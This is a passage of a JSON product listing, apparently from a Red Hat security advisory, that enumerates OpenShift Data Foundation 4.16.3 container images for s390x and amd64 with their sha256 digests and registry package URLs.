"product_id": "odf4/odf-csi-addons-operator-bundle@sha256:b8cc383dca903d2e229772937306456bde2b80ea3200ba354789a232fde825c9_s390x",
"product_identification_helper": {
"purl": "pkg:oci/odf-csi-addons-operator-bundle@sha256:b8cc383dca903d2e229772937306456bde2b80ea3200ba354789a232fde825c9?arch=s390x\u0026repository_url=registry.redhat.io/odf4/odf-csi-addons-operator-bundle\u0026tag=v4.16.3-2"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-csi-addons-rhel9-operator@sha256:4005df877f43b05aaa7f63a77fa8ad29b980121fbb3eb97c4470c8744abb7a11_s390x",
"product": {
"name": "odf4/odf-csi-addons-rhel9-operator@sha256:4005df877f43b05aaa7f63a77fa8ad29b980121fbb3eb97c4470c8744abb7a11_s390x",
"product_id": "odf4/odf-csi-addons-rhel9-operator@sha256:4005df877f43b05aaa7f63a77fa8ad29b980121fbb3eb97c4470c8744abb7a11_s390x",
"product_identification_helper": {
"purl": "pkg:oci/odf-csi-addons-rhel9-operator@sha256:4005df877f43b05aaa7f63a77fa8ad29b980121fbb3eb97c4470c8744abb7a11?arch=s390x\u0026repository_url=registry.redhat.io/odf4/odf-csi-addons-rhel9-operator\u0026tag=v4.16.3-1"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-csi-addons-sidecar-rhel9@sha256:9c9bbf026f4fcf7da90729b2c49850d16bb2b48997c68782117ef495c99b57ce_s390x",
"product": {
"name": "odf4/odf-csi-addons-sidecar-rhel9@sha256:9c9bbf026f4fcf7da90729b2c49850d16bb2b48997c68782117ef495c99b57ce_s390x",
"product_id": "odf4/odf-csi-addons-sidecar-rhel9@sha256:9c9bbf026f4fcf7da90729b2c49850d16bb2b48997c68782117ef495c99b57ce_s390x",
"product_identification_helper": {
"purl": "pkg:oci/odf-csi-addons-sidecar-rhel9@sha256:9c9bbf026f4fcf7da90729b2c49850d16bb2b48997c68782117ef495c99b57ce?arch=s390x\u0026repository_url=registry.redhat.io/odf4/odf-csi-addons-sidecar-rhel9\u0026tag=v4.16.3-1"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-multicluster-console-rhel9@sha256:4000cc38f48546a17f728a2328871d3deda6015742f5a11587207ecf84225460_s390x",
"product": {
"name": "odf4/odf-multicluster-console-rhel9@sha256:4000cc38f48546a17f728a2328871d3deda6015742f5a11587207ecf84225460_s390x",
"product_id": "odf4/odf-multicluster-console-rhel9@sha256:4000cc38f48546a17f728a2328871d3deda6015742f5a11587207ecf84225460_s390x",
"product_identification_helper": {
"purl": "pkg:oci/odf-multicluster-console-rhel9@sha256:4000cc38f48546a17f728a2328871d3deda6015742f5a11587207ecf84225460?arch=s390x\u0026repository_url=registry.redhat.io/odf4/odf-multicluster-console-rhel9\u0026tag=v4.16.3-1"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-multicluster-operator-bundle@sha256:dc943e771dfb8b180c13b84a0a2aebb9f9e01d720aa89f492ee8c120dd7af372_s390x",
"product": {
"name": "odf4/odf-multicluster-operator-bundle@sha256:dc943e771dfb8b180c13b84a0a2aebb9f9e01d720aa89f492ee8c120dd7af372_s390x",
"product_id": "odf4/odf-multicluster-operator-bundle@sha256:dc943e771dfb8b180c13b84a0a2aebb9f9e01d720aa89f492ee8c120dd7af372_s390x",
"product_identification_helper": {
"purl": "pkg:oci/odf-multicluster-operator-bundle@sha256:dc943e771dfb8b180c13b84a0a2aebb9f9e01d720aa89f492ee8c120dd7af372?arch=s390x\u0026repository_url=registry.redhat.io/odf4/odf-multicluster-operator-bundle\u0026tag=v4.16.3-2"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-multicluster-rhel9-operator@sha256:6f7cb7c3f4a5957c44972644b980d5f83beda026a48c97315b7a47b698f24e37_s390x",
"product": {
"name": "odf4/odf-multicluster-rhel9-operator@sha256:6f7cb7c3f4a5957c44972644b980d5f83beda026a48c97315b7a47b698f24e37_s390x",
"product_id": "odf4/odf-multicluster-rhel9-operator@sha256:6f7cb7c3f4a5957c44972644b980d5f83beda026a48c97315b7a47b698f24e37_s390x",
"product_identification_helper": {
"purl": "pkg:oci/odf-multicluster-rhel9-operator@sha256:6f7cb7c3f4a5957c44972644b980d5f83beda026a48c97315b7a47b698f24e37?arch=s390x\u0026repository_url=registry.redhat.io/odf4/odf-multicluster-rhel9-operator\u0026tag=v4.16.3-1"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-must-gather-rhel9@sha256:a42e96f4758df3fc79cbd67b67b41ed2ef53db904395d8b08cbe5cd3f8e4ecb4_s390x",
"product": {
"name": "odf4/odf-must-gather-rhel9@sha256:a42e96f4758df3fc79cbd67b67b41ed2ef53db904395d8b08cbe5cd3f8e4ecb4_s390x",
"product_id": "odf4/odf-must-gather-rhel9@sha256:a42e96f4758df3fc79cbd67b67b41ed2ef53db904395d8b08cbe5cd3f8e4ecb4_s390x",
"product_identification_helper": {
"purl": "pkg:oci/odf-must-gather-rhel9@sha256:a42e96f4758df3fc79cbd67b67b41ed2ef53db904395d8b08cbe5cd3f8e4ecb4?arch=s390x\u0026repository_url=registry.redhat.io/odf4/odf-must-gather-rhel9\u0026tag=v4.16.3-1"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-operator-bundle@sha256:715f53af949614a8a72252a19edbe9eb84c53ac8434da6b32366039046e679e5_s390x",
"product": {
"name": "odf4/odf-operator-bundle@sha256:715f53af949614a8a72252a19edbe9eb84c53ac8434da6b32366039046e679e5_s390x",
"product_id": "odf4/odf-operator-bundle@sha256:715f53af949614a8a72252a19edbe9eb84c53ac8434da6b32366039046e679e5_s390x",
"product_identification_helper": {
"purl": "pkg:oci/odf-operator-bundle@sha256:715f53af949614a8a72252a19edbe9eb84c53ac8434da6b32366039046e679e5?arch=s390x\u0026repository_url=registry.redhat.io/odf4/odf-operator-bundle\u0026tag=v4.16.3-2"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-rhel9-operator@sha256:8a812868150ffa298110bf81d30ae3aecf152003ed64f927f1416e36cc0e579d_s390x",
"product": {
"name": "odf4/odf-rhel9-operator@sha256:8a812868150ffa298110bf81d30ae3aecf152003ed64f927f1416e36cc0e579d_s390x",
"product_id": "odf4/odf-rhel9-operator@sha256:8a812868150ffa298110bf81d30ae3aecf152003ed64f927f1416e36cc0e579d_s390x",
"product_identification_helper": {
"purl": "pkg:oci/odf-rhel9-operator@sha256:8a812868150ffa298110bf81d30ae3aecf152003ed64f927f1416e36cc0e579d?arch=s390x\u0026repository_url=registry.redhat.io/odf4/odf-rhel9-operator\u0026tag=v4.16.3-2"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-prometheus-operator-bundle@sha256:a91d41a5bfcf9b7fcd4504c59dd3d44be644ef5dea929d1b4dcb26fffec4f45c_s390x",
"product": {
"name": "odf4/odf-prometheus-operator-bundle@sha256:a91d41a5bfcf9b7fcd4504c59dd3d44be644ef5dea929d1b4dcb26fffec4f45c_s390x",
"product_id": "odf4/odf-prometheus-operator-bundle@sha256:a91d41a5bfcf9b7fcd4504c59dd3d44be644ef5dea929d1b4dcb26fffec4f45c_s390x",
"product_identification_helper": {
"purl": "pkg:oci/odf-prometheus-operator-bundle@sha256:a91d41a5bfcf9b7fcd4504c59dd3d44be644ef5dea929d1b4dcb26fffec4f45c?arch=s390x\u0026repository_url=registry.redhat.io/odf4/odf-prometheus-operator-bundle\u0026tag=v4.16.3-2"
}
}
},
{
"category": "product_version",
"name": "odf4/odr-cluster-operator-bundle@sha256:a49df6e9be0a6554622abc1d01ed872271b89cc97c802cb8c90bd969943d31f9_s390x",
"product": {
"name": "odf4/odr-cluster-operator-bundle@sha256:a49df6e9be0a6554622abc1d01ed872271b89cc97c802cb8c90bd969943d31f9_s390x",
"product_id": "odf4/odr-cluster-operator-bundle@sha256:a49df6e9be0a6554622abc1d01ed872271b89cc97c802cb8c90bd969943d31f9_s390x",
"product_identification_helper": {
"purl": "pkg:oci/odr-cluster-operator-bundle@sha256:a49df6e9be0a6554622abc1d01ed872271b89cc97c802cb8c90bd969943d31f9?arch=s390x\u0026repository_url=registry.redhat.io/odf4/odr-cluster-operator-bundle\u0026tag=v4.16.3-2"
}
}
},
{
"category": "product_version",
"name": "odf4/odr-hub-operator-bundle@sha256:f20e6ba21e4ad8e7d66b8de3b7f4d5f5580ef414c55134a28c1c025da365b3b0_s390x",
"product": {
"name": "odf4/odr-hub-operator-bundle@sha256:f20e6ba21e4ad8e7d66b8de3b7f4d5f5580ef414c55134a28c1c025da365b3b0_s390x",
"product_id": "odf4/odr-hub-operator-bundle@sha256:f20e6ba21e4ad8e7d66b8de3b7f4d5f5580ef414c55134a28c1c025da365b3b0_s390x",
"product_identification_helper": {
"purl": "pkg:oci/odr-hub-operator-bundle@sha256:f20e6ba21e4ad8e7d66b8de3b7f4d5f5580ef414c55134a28c1c025da365b3b0?arch=s390x\u0026repository_url=registry.redhat.io/odf4/odr-hub-operator-bundle\u0026tag=v4.16.3-2"
}
}
},
{
"category": "product_version",
"name": "odf4/odr-rhel9-operator@sha256:9b57ab1ec3d520d8c8fbc3584cd833b2262b6fa949c3b84cbbc43b899f0314e5_s390x",
"product": {
"name": "odf4/odr-rhel9-operator@sha256:9b57ab1ec3d520d8c8fbc3584cd833b2262b6fa949c3b84cbbc43b899f0314e5_s390x",
"product_id": "odf4/odr-rhel9-operator@sha256:9b57ab1ec3d520d8c8fbc3584cd833b2262b6fa949c3b84cbbc43b899f0314e5_s390x",
"product_identification_helper": {
"purl": "pkg:oci/odr-rhel9-operator@sha256:9b57ab1ec3d520d8c8fbc3584cd833b2262b6fa949c3b84cbbc43b899f0314e5?arch=s390x\u0026repository_url=registry.redhat.io/odf4/odr-rhel9-operator\u0026tag=v4.16.3-1"
}
}
},
{
"category": "product_version",
"name": "odf4/odr-recipe-operator-bundle@sha256:8d320cc20359f8d44957a72cfb80f98f228506fbb9b9318cddd64a3120166356_s390x",
"product": {
"name": "odf4/odr-recipe-operator-bundle@sha256:8d320cc20359f8d44957a72cfb80f98f228506fbb9b9318cddd64a3120166356_s390x",
"product_id": "odf4/odr-recipe-operator-bundle@sha256:8d320cc20359f8d44957a72cfb80f98f228506fbb9b9318cddd64a3120166356_s390x",
"product_identification_helper": {
"purl": "pkg:oci/odr-recipe-operator-bundle@sha256:8d320cc20359f8d44957a72cfb80f98f228506fbb9b9318cddd64a3120166356?arch=s390x\u0026repository_url=registry.redhat.io/odf4/odr-recipe-operator-bundle\u0026tag=v4.16.3-2"
}
}
},
{
"category": "product_version",
"name": "odf4/rook-ceph-operator-bundle@sha256:3d6a235a8365186279b13335bbd6705efeac2fcd4211acd79df2b62de701479a_s390x",
"product": {
"name": "odf4/rook-ceph-operator-bundle@sha256:3d6a235a8365186279b13335bbd6705efeac2fcd4211acd79df2b62de701479a_s390x",
"product_id": "odf4/rook-ceph-operator-bundle@sha256:3d6a235a8365186279b13335bbd6705efeac2fcd4211acd79df2b62de701479a_s390x",
"product_identification_helper": {
"purl": "pkg:oci/rook-ceph-operator-bundle@sha256:3d6a235a8365186279b13335bbd6705efeac2fcd4211acd79df2b62de701479a?arch=s390x\u0026repository_url=registry.redhat.io/odf4/rook-ceph-operator-bundle\u0026tag=v4.16.3-2"
}
}
},
{
"category": "product_version",
"name": "odf4/rook-ceph-rhel9-operator@sha256:b91c27e3cc9b1b35eaeac17e8b34da3cf0450584105a08f2cf3406c5ed41d7aa_s390x",
"product": {
"name": "odf4/rook-ceph-rhel9-operator@sha256:b91c27e3cc9b1b35eaeac17e8b34da3cf0450584105a08f2cf3406c5ed41d7aa_s390x",
"product_id": "odf4/rook-ceph-rhel9-operator@sha256:b91c27e3cc9b1b35eaeac17e8b34da3cf0450584105a08f2cf3406c5ed41d7aa_s390x",
"product_identification_helper": {
"purl": "pkg:oci/rook-ceph-rhel9-operator@sha256:b91c27e3cc9b1b35eaeac17e8b34da3cf0450584105a08f2cf3406c5ed41d7aa?arch=s390x\u0026repository_url=registry.redhat.io/odf4/rook-ceph-rhel9-operator\u0026tag=v4.16.3-1"
}
}
}
],
"category": "architecture",
"name": "s390x"
},
{
"branches": [
{
"category": "product_version",
"name": "odf4/cephcsi-rhel9@sha256:6312b4e4365530b398d34769da34113b156ff407d0189d2b909c2b27a5b344c5_amd64",
"product": {
"name": "odf4/cephcsi-rhel9@sha256:6312b4e4365530b398d34769da34113b156ff407d0189d2b909c2b27a5b344c5_amd64",
"product_id": "odf4/cephcsi-rhel9@sha256:6312b4e4365530b398d34769da34113b156ff407d0189d2b909c2b27a5b344c5_amd64",
"product_identification_helper": {
"purl": "pkg:oci/cephcsi-rhel9@sha256:6312b4e4365530b398d34769da34113b156ff407d0189d2b909c2b27a5b344c5?arch=amd64\u0026repository_url=registry.redhat.io/odf4/cephcsi-rhel9\u0026tag=v4.16.3-1"
}
}
},
{
"category": "product_version",
"name": "odf4/mcg-core-rhel9@sha256:9eb29e92f64fb85151d6fced24d3b97ecd73df25d00d9c27bc43b08c41c48b55_amd64",
"product": {
"name": "odf4/mcg-core-rhel9@sha256:9eb29e92f64fb85151d6fced24d3b97ecd73df25d00d9c27bc43b08c41c48b55_amd64",
"product_id": "odf4/mcg-core-rhel9@sha256:9eb29e92f64fb85151d6fced24d3b97ecd73df25d00d9c27bc43b08c41c48b55_amd64",
"product_identification_helper": {
"purl": "pkg:oci/mcg-core-rhel9@sha256:9eb29e92f64fb85151d6fced24d3b97ecd73df25d00d9c27bc43b08c41c48b55?arch=amd64\u0026repository_url=registry.redhat.io/odf4/mcg-core-rhel9\u0026tag=v4.16.3-1"
}
}
},
{
"category": "product_version",
"name": "odf4/mcg-operator-bundle@sha256:5dc780b845bf22a5ed8350a0c8783d1fb8a0fef4ce2e1c3265db82fd236ea3e1_amd64",
"product": {
"name": "odf4/mcg-operator-bundle@sha256:5dc780b845bf22a5ed8350a0c8783d1fb8a0fef4ce2e1c3265db82fd236ea3e1_amd64",
"product_id": "odf4/mcg-operator-bundle@sha256:5dc780b845bf22a5ed8350a0c8783d1fb8a0fef4ce2e1c3265db82fd236ea3e1_amd64",
"product_identification_helper": {
"purl": "pkg:oci/mcg-operator-bundle@sha256:5dc780b845bf22a5ed8350a0c8783d1fb8a0fef4ce2e1c3265db82fd236ea3e1?arch=amd64\u0026repository_url=registry.redhat.io/odf4/mcg-operator-bundle\u0026tag=v4.16.3-2"
}
}
},
{
"category": "product_version",
"name": "odf4/mcg-rhel9-operator@sha256:0e0a5877546c28076ad99cc22e560d6c952959c142e269fa83d866d5fff95e87_amd64",
"product": {
"name": "odf4/mcg-rhel9-operator@sha256:0e0a5877546c28076ad99cc22e560d6c952959c142e269fa83d866d5fff95e87_amd64",
"product_id": "odf4/mcg-rhel9-operator@sha256:0e0a5877546c28076ad99cc22e560d6c952959c142e269fa83d866d5fff95e87_amd64",
"product_identification_helper": {
"purl": "pkg:oci/mcg-rhel9-operator@sha256:0e0a5877546c28076ad99cc22e560d6c952959c142e269fa83d866d5fff95e87?arch=amd64\u0026repository_url=registry.redhat.io/odf4/mcg-rhel9-operator\u0026tag=v4.16.3-1"
}
}
},
{
"category": "product_version",
"name": "odf4/ocs-client-console-rhel9@sha256:bf828ca2293ac3be275613872212e56049880a2a8ad6c8f1bb5bb66187d8e085_amd64",
"product": {
"name": "odf4/ocs-client-console-rhel9@sha256:bf828ca2293ac3be275613872212e56049880a2a8ad6c8f1bb5bb66187d8e085_amd64",
"product_id": "odf4/ocs-client-console-rhel9@sha256:bf828ca2293ac3be275613872212e56049880a2a8ad6c8f1bb5bb66187d8e085_amd64",
"product_identification_helper": {
"purl": "pkg:oci/ocs-client-console-rhel9@sha256:bf828ca2293ac3be275613872212e56049880a2a8ad6c8f1bb5bb66187d8e085?arch=amd64\u0026repository_url=registry.redhat.io/odf4/ocs-client-console-rhel9\u0026tag=v4.16.3-1"
}
}
},
{
"category": "product_version",
"name": "odf4/ocs-client-operator-bundle@sha256:123523041fe4092a36fd41cc6203802d903188642bde1a40f22515a5715fff81_amd64",
"product": {
"name": "odf4/ocs-client-operator-bundle@sha256:123523041fe4092a36fd41cc6203802d903188642bde1a40f22515a5715fff81_amd64",
"product_id": "odf4/ocs-client-operator-bundle@sha256:123523041fe4092a36fd41cc6203802d903188642bde1a40f22515a5715fff81_amd64",
"product_identification_helper": {
"purl": "pkg:oci/ocs-client-operator-bundle@sha256:123523041fe4092a36fd41cc6203802d903188642bde1a40f22515a5715fff81?arch=amd64\u0026repository_url=registry.redhat.io/odf4/ocs-client-operator-bundle\u0026tag=v4.16.3-2"
}
}
},
{
"category": "product_version",
"name": "odf4/ocs-client-rhel9-operator@sha256:9838494b592782f0ba76f7a6c35f0038c0cb8853f6fff4ee9f7001a9888be5e7_amd64",
"product": {
"name": "odf4/ocs-client-rhel9-operator@sha256:9838494b592782f0ba76f7a6c35f0038c0cb8853f6fff4ee9f7001a9888be5e7_amd64",
"product_id": "odf4/ocs-client-rhel9-operator@sha256:9838494b592782f0ba76f7a6c35f0038c0cb8853f6fff4ee9f7001a9888be5e7_amd64",
"product_identification_helper": {
"purl": "pkg:oci/ocs-client-rhel9-operator@sha256:9838494b592782f0ba76f7a6c35f0038c0cb8853f6fff4ee9f7001a9888be5e7?arch=amd64\u0026repository_url=registry.redhat.io/odf4/ocs-client-rhel9-operator\u0026tag=v4.16.3-1"
}
}
},
{
"category": "product_version",
"name": "odf4/ocs-metrics-exporter-rhel9@sha256:6b0b554925b945370aeb786e45f7f8676f8760c572df03153b8682bd42e8d477_amd64",
"product": {
"name": "odf4/ocs-metrics-exporter-rhel9@sha256:6b0b554925b945370aeb786e45f7f8676f8760c572df03153b8682bd42e8d477_amd64",
"product_id": "odf4/ocs-metrics-exporter-rhel9@sha256:6b0b554925b945370aeb786e45f7f8676f8760c572df03153b8682bd42e8d477_amd64",
"product_identification_helper": {
"purl": "pkg:oci/ocs-metrics-exporter-rhel9@sha256:6b0b554925b945370aeb786e45f7f8676f8760c572df03153b8682bd42e8d477?arch=amd64\u0026repository_url=registry.redhat.io/odf4/ocs-metrics-exporter-rhel9\u0026tag=v4.16.3-1"
}
}
},
{
"category": "product_version",
"name": "odf4/ocs-operator-bundle@sha256:1bbc151acb46edd4c042acd66d028eaa6b514204ad79c8be708d89f07c9f9e81_amd64",
"product": {
"name": "odf4/ocs-operator-bundle@sha256:1bbc151acb46edd4c042acd66d028eaa6b514204ad79c8be708d89f07c9f9e81_amd64",
"product_id": "odf4/ocs-operator-bundle@sha256:1bbc151acb46edd4c042acd66d028eaa6b514204ad79c8be708d89f07c9f9e81_amd64",
"product_identification_helper": {
"purl": "pkg:oci/ocs-operator-bundle@sha256:1bbc151acb46edd4c042acd66d028eaa6b514204ad79c8be708d89f07c9f9e81?arch=amd64\u0026repository_url=registry.redhat.io/odf4/ocs-operator-bundle\u0026tag=v4.16.3-2"
}
}
},
{
"category": "product_version",
"name": "odf4/ocs-rhel9-operator@sha256:6349fb76ed7d1b83ecddbadeb2325408eed283d02b12285f534407aea557362c_amd64",
"product": {
"name": "odf4/ocs-rhel9-operator@sha256:6349fb76ed7d1b83ecddbadeb2325408eed283d02b12285f534407aea557362c_amd64",
"product_id": "odf4/ocs-rhel9-operator@sha256:6349fb76ed7d1b83ecddbadeb2325408eed283d02b12285f534407aea557362c_amd64",
"product_identification_helper": {
"purl": "pkg:oci/ocs-rhel9-operator@sha256:6349fb76ed7d1b83ecddbadeb2325408eed283d02b12285f534407aea557362c?arch=amd64\u0026repository_url=registry.redhat.io/odf4/ocs-rhel9-operator\u0026tag=v4.16.3-1"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-cli-rhel9@sha256:33d6b3c313d90a89e662516e96fb590cc12b101f6f481acbd1837fe3fb15e2fc_amd64",
"product": {
"name": "odf4/odf-cli-rhel9@sha256:33d6b3c313d90a89e662516e96fb590cc12b101f6f481acbd1837fe3fb15e2fc_amd64",
"product_id": "odf4/odf-cli-rhel9@sha256:33d6b3c313d90a89e662516e96fb590cc12b101f6f481acbd1837fe3fb15e2fc_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odf-cli-rhel9@sha256:33d6b3c313d90a89e662516e96fb590cc12b101f6f481acbd1837fe3fb15e2fc?arch=amd64\u0026repository_url=registry.redhat.io/odf4/odf-cli-rhel9\u0026tag=v4.16.3-1"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-console-rhel9@sha256:3071570a86e4869917fd240f2ebd2fe045b3dade7d0ad02853285c1654a703a5_amd64",
"product": {
"name": "odf4/odf-console-rhel9@sha256:3071570a86e4869917fd240f2ebd2fe045b3dade7d0ad02853285c1654a703a5_amd64",
"product_id": "odf4/odf-console-rhel9@sha256:3071570a86e4869917fd240f2ebd2fe045b3dade7d0ad02853285c1654a703a5_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odf-console-rhel9@sha256:3071570a86e4869917fd240f2ebd2fe045b3dade7d0ad02853285c1654a703a5?arch=amd64\u0026repository_url=registry.redhat.io/odf4/odf-console-rhel9\u0026tag=v4.16.3-1"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-cosi-sidecar-rhel9@sha256:4ba8eb0bf46dad3c65c61882d92fa54de452dcdf642bd40504cd8bbd4494558f_amd64",
"product": {
"name": "odf4/odf-cosi-sidecar-rhel9@sha256:4ba8eb0bf46dad3c65c61882d92fa54de452dcdf642bd40504cd8bbd4494558f_amd64",
"product_id": "odf4/odf-cosi-sidecar-rhel9@sha256:4ba8eb0bf46dad3c65c61882d92fa54de452dcdf642bd40504cd8bbd4494558f_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odf-cosi-sidecar-rhel9@sha256:4ba8eb0bf46dad3c65c61882d92fa54de452dcdf642bd40504cd8bbd4494558f?arch=amd64\u0026repository_url=registry.redhat.io/odf4/odf-cosi-sidecar-rhel9\u0026tag=v4.16.3-1"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-csi-addons-operator-bundle@sha256:8721c6de61a7ee31e1312856e5887a36be7b1ce930fcba24b720097d286be6f6_amd64",
"product": {
"name": "odf4/odf-csi-addons-operator-bundle@sha256:8721c6de61a7ee31e1312856e5887a36be7b1ce930fcba24b720097d286be6f6_amd64",
"product_id": "odf4/odf-csi-addons-operator-bundle@sha256:8721c6de61a7ee31e1312856e5887a36be7b1ce930fcba24b720097d286be6f6_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odf-csi-addons-operator-bundle@sha256:8721c6de61a7ee31e1312856e5887a36be7b1ce930fcba24b720097d286be6f6?arch=amd64\u0026repository_url=registry.redhat.io/odf4/odf-csi-addons-operator-bundle\u0026tag=v4.16.3-2"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-csi-addons-rhel9-operator@sha256:1487325c0aabb062ce9dfe7f2b3a7b3ba03b42231455406b1f3818bda124a6e9_amd64",
"product": {
"name": "odf4/odf-csi-addons-rhel9-operator@sha256:1487325c0aabb062ce9dfe7f2b3a7b3ba03b42231455406b1f3818bda124a6e9_amd64",
"product_id": "odf4/odf-csi-addons-rhel9-operator@sha256:1487325c0aabb062ce9dfe7f2b3a7b3ba03b42231455406b1f3818bda124a6e9_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odf-csi-addons-rhel9-operator@sha256:1487325c0aabb062ce9dfe7f2b3a7b3ba03b42231455406b1f3818bda124a6e9?arch=amd64\u0026repository_url=registry.redhat.io/odf4/odf-csi-addons-rhel9-operator\u0026tag=v4.16.3-1"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-csi-addons-sidecar-rhel9@sha256:3507841b2f0757a42fed5ba0e6e94a029ce924d98e085cc384798c2b37c019fe_amd64",
"product": {
"name": "odf4/odf-csi-addons-sidecar-rhel9@sha256:3507841b2f0757a42fed5ba0e6e94a029ce924d98e085cc384798c2b37c019fe_amd64",
"product_id": "odf4/odf-csi-addons-sidecar-rhel9@sha256:3507841b2f0757a42fed5ba0e6e94a029ce924d98e085cc384798c2b37c019fe_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odf-csi-addons-sidecar-rhel9@sha256:3507841b2f0757a42fed5ba0e6e94a029ce924d98e085cc384798c2b37c019fe?arch=amd64\u0026repository_url=registry.redhat.io/odf4/odf-csi-addons-sidecar-rhel9\u0026tag=v4.16.3-1"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-multicluster-console-rhel9@sha256:30fcd0f6e1fbb29456163e00a8c5c6c90d9c0dc27b0435a50cb42d20f52e686f_amd64",
"product": {
"name": "odf4/odf-multicluster-console-rhel9@sha256:30fcd0f6e1fbb29456163e00a8c5c6c90d9c0dc27b0435a50cb42d20f52e686f_amd64",
"product_id": "odf4/odf-multicluster-console-rhel9@sha256:30fcd0f6e1fbb29456163e00a8c5c6c90d9c0dc27b0435a50cb42d20f52e686f_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odf-multicluster-console-rhel9@sha256:30fcd0f6e1fbb29456163e00a8c5c6c90d9c0dc27b0435a50cb42d20f52e686f?arch=amd64\u0026repository_url=registry.redhat.io/odf4/odf-multicluster-console-rhel9\u0026tag=v4.16.3-1"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-multicluster-operator-bundle@sha256:26dc5caa38dc2e1d61d66820be14e991fee386d17f5405e801ab6141e317df64_amd64",
"product": {
"name": "odf4/odf-multicluster-operator-bundle@sha256:26dc5caa38dc2e1d61d66820be14e991fee386d17f5405e801ab6141e317df64_amd64",
"product_id": "odf4/odf-multicluster-operator-bundle@sha256:26dc5caa38dc2e1d61d66820be14e991fee386d17f5405e801ab6141e317df64_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odf-multicluster-operator-bundle@sha256:26dc5caa38dc2e1d61d66820be14e991fee386d17f5405e801ab6141e317df64?arch=amd64\u0026repository_url=registry.redhat.io/odf4/odf-multicluster-operator-bundle\u0026tag=v4.16.3-2"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-multicluster-rhel9-operator@sha256:f056fae131175a4e179ad3f267f44562eec169383d382c67398eb5d3d74ab50a_amd64",
"product": {
"name": "odf4/odf-multicluster-rhel9-operator@sha256:f056fae131175a4e179ad3f267f44562eec169383d382c67398eb5d3d74ab50a_amd64",
"product_id": "odf4/odf-multicluster-rhel9-operator@sha256:f056fae131175a4e179ad3f267f44562eec169383d382c67398eb5d3d74ab50a_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odf-multicluster-rhel9-operator@sha256:f056fae131175a4e179ad3f267f44562eec169383d382c67398eb5d3d74ab50a?arch=amd64\u0026repository_url=registry.redhat.io/odf4/odf-multicluster-rhel9-operator\u0026tag=v4.16.3-1"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-must-gather-rhel9@sha256:00a38f702a6b771ff58392e323c52d3be66ec43d61a1b2c3a8664f92b6698ae3_amd64",
"product": {
"name": "odf4/odf-must-gather-rhel9@sha256:00a38f702a6b771ff58392e323c52d3be66ec43d61a1b2c3a8664f92b6698ae3_amd64",
"product_id": "odf4/odf-must-gather-rhel9@sha256:00a38f702a6b771ff58392e323c52d3be66ec43d61a1b2c3a8664f92b6698ae3_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odf-must-gather-rhel9@sha256:00a38f702a6b771ff58392e323c52d3be66ec43d61a1b2c3a8664f92b6698ae3?arch=amd64\u0026repository_url=registry.redhat.io/odf4/odf-must-gather-rhel9\u0026tag=v4.16.3-1"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-operator-bundle@sha256:e5c49afe79002be166f7b51421d712069ad6fe67c54743c8a991afd97f9f30f6_amd64",
"product": {
"name": "odf4/odf-operator-bundle@sha256:e5c49afe79002be166f7b51421d712069ad6fe67c54743c8a991afd97f9f30f6_amd64",
"product_id": "odf4/odf-operator-bundle@sha256:e5c49afe79002be166f7b51421d712069ad6fe67c54743c8a991afd97f9f30f6_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odf-operator-bundle@sha256:e5c49afe79002be166f7b51421d712069ad6fe67c54743c8a991afd97f9f30f6?arch=amd64\u0026repository_url=registry.redhat.io/odf4/odf-operator-bundle\u0026tag=v4.16.3-2"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-rhel9-operator@sha256:28a47c19fadade32960712e3e23c21ef79369c045d2016f00564a9291b483dfd_amd64",
"product": {
"name": "odf4/odf-rhel9-operator@sha256:28a47c19fadade32960712e3e23c21ef79369c045d2016f00564a9291b483dfd_amd64",
"product_id": "odf4/odf-rhel9-operator@sha256:28a47c19fadade32960712e3e23c21ef79369c045d2016f00564a9291b483dfd_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odf-rhel9-operator@sha256:28a47c19fadade32960712e3e23c21ef79369c045d2016f00564a9291b483dfd?arch=amd64\u0026repository_url=registry.redhat.io/odf4/odf-rhel9-operator\u0026tag=v4.16.3-2"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-prometheus-operator-bundle@sha256:5ddcb5b3ff0a69c80857e5185dcfd9e397ba0ad1272e66cd98acd729996d006a_amd64",
"product": {
"name": "odf4/odf-prometheus-operator-bundle@sha256:5ddcb5b3ff0a69c80857e5185dcfd9e397ba0ad1272e66cd98acd729996d006a_amd64",
"product_id": "odf4/odf-prometheus-operator-bundle@sha256:5ddcb5b3ff0a69c80857e5185dcfd9e397ba0ad1272e66cd98acd729996d006a_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odf-prometheus-operator-bundle@sha256:5ddcb5b3ff0a69c80857e5185dcfd9e397ba0ad1272e66cd98acd729996d006a?arch=amd64\u0026repository_url=registry.redhat.io/odf4/odf-prometheus-operator-bundle\u0026tag=v4.16.3-2"
}
}
},
{
"category": "product_version",
"name": "odf4/odr-cluster-operator-bundle@sha256:1777e37400e5e8d736bbeec8a0123b573eb77b416460322c082c25f711b6af0d_amd64",
"product": {
